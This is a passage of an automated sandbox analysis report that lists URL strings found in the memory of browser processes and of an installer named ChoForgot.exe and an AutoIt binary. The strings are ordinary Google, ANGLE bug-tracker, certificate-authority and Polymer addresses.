                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
                Source: chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860-
                Source: chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                Source: chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                Source: chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641961362.000047E400AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                Source: chrome.exe, 00000011.00000002.2641961362.000047E400AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279Q
                Source: chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2637078288.000047E400013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2706167310.00005B8002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488/
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                Source: chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641961362.000047E400AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761e-data
                Source: chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640778355.000047E4007E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                Source: chrome.exe, 00000011.00000002.2640056642.000047E400630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640417345.000047E4006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                Source: chrome.exe, 00000011.00000002.2640056642.000047E400630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280G
                Source: ChoForgot.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: ChoForgot.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: ChoForgot.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
                Source: chrome.exe, 00000011.00000002.2640262507.000047E400688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                Source: ChoForgot.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: ChoForgot.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                Source: ChoForgot.exe, Wb.com.2.dr, Improve.9.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: ChoForgot.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: ChoForgot.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: ChoForgot.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: chrome.exe, 00000011.00000002.2637619690.000047E4000EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.chrome.com/extensions/external_extensions.html)
                Source: chrome.exe, 00000011.00000002.2637436088.000047E40008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                Source: chrome.exe, 00000011.00000003.2562051348.000047E401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562106489.000047E400F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2561992788.000047E401038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562230107.000047E401064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                Source: ChoForgot.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: ChoForgot.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: ChoForgot.exeString found in binary or memory: http://ocsp.digicert.com0C
                Source: ChoForgot.exeString found in binary or memory: http://ocsp.digicert.com0X
                Source: ChoForgot.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: ChoForgot.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                Source: ChoForgot.exeString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                Source: chrome.exe, 00000011.00000003.2563420053.000047E400FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563294728.000047E400484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562051348.000047E401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562106489.000047E400F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2561992788.000047E401038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563818278.000047E4010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563325160.000047E400A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563354255.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562078960.000047E401098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2564082691.000047E40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641447831.000047E4009B3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562230107.000047E401064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2578349324.000047E400E38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563598629.000047E400E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                Source: chrome.exe, 00000011.00000003.2563420053.000047E400FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563294728.000047E400484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562051348.000047E401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562106489.000047E400F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2561992788.000047E401038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563818278.000047E4010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563325160.000047E400A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563354255.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562078960.000047E401098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2564082691.000047E40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641447831.000047E4009B3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562230107.000047E401064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2578349324.000047E400E38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563598629.000047E400E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                Source: chrome.exe, 00000011.00000003.2563420053.000047E400FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563294728.000047E400484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562051348.000047E401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562106489.000047E400F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2561992788.000047E401038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563818278.000047E4010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563325160.000047E400A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563354255.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562078960.000047E401098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2564082691.000047E40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641447831.000047E4009B3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562230107.000047E401064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2578349324.000047E400E38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563598629.000047E400E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
                Source: chrome.exe, 00000011.00000003.2563420053.000047E400FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563294728.000047E400484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562051348.000047E401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562106489.000047E400F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2561992788.000047E401038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563818278.000047E4010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563325160.000047E400A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563354255.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562078960.000047E401098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2564082691.000047E40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641447831.000047E4009B3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562230107.000047E401064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2578349324.000047E400E38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563598629.000047E400E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
                Source: chrome.exe, 00000011.00000002.2641275257.000047E400900000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2637375236.000047E400080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
                Source: chrome.exe, 00000011.00000002.2641447831.000047E400994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
                Source: chrome.exe, 00000011.00000002.2641447831.000047E400994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certsG
                Source: ChoForgot.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: ChoForgot.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                Source: ChoForgot.exeString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                Source: chrome.exe, 00000011.00000002.2641605337.000047E4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
                Source: Wb.com, 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp, Wb.com.2.dr, Ensures.9.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                Source: chrome.exe, 00000011.00000002.2641749171.000047E400A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
                Source: Wb.com, 0000000C.00000002.3031181433.00000000045E3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2642382450.000047E400C0C000.00000004.00000800.00020000.00000000.sdmp, MO8G47.12.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
                Source: chrome.exe, 00000011.00000002.2637512561.000047E400098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639001052.000047E40040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639104639.000047E400494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2637078288.000047E400013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                Source: chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/G
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
                Source: chrome.exe, 00000011.00000003.2556554315.000047E400BE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2560352500.000047E400BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
                Source: chrome.exe, 00000011.00000003.2560352500.000047E400BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardG
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
                Source: chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
                Source: chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/MergeSession
                Source: chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/OAuthLogin
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
                Source: chrome.exe, 00000011.00000002.2640691773.000047E4007C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
                Source: chrome.exe, 00000011.00000003.2580999674.000047E4002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
                Source: chrome.exe, 00000011.00000003.2580999674.000047E4002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
                Source: chrome.exe, 00000011.00000002.2637542005.000047E4000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
                Source: chrome.exe, 00000011.00000002.2637542005.000047E4000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
                Source: chrome.exe, 00000011.00000002.2637542005.000047E4000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
                Source: chrome.exe, 00000011.00000002.2637512561.000047E400098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com:443
                Source: chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
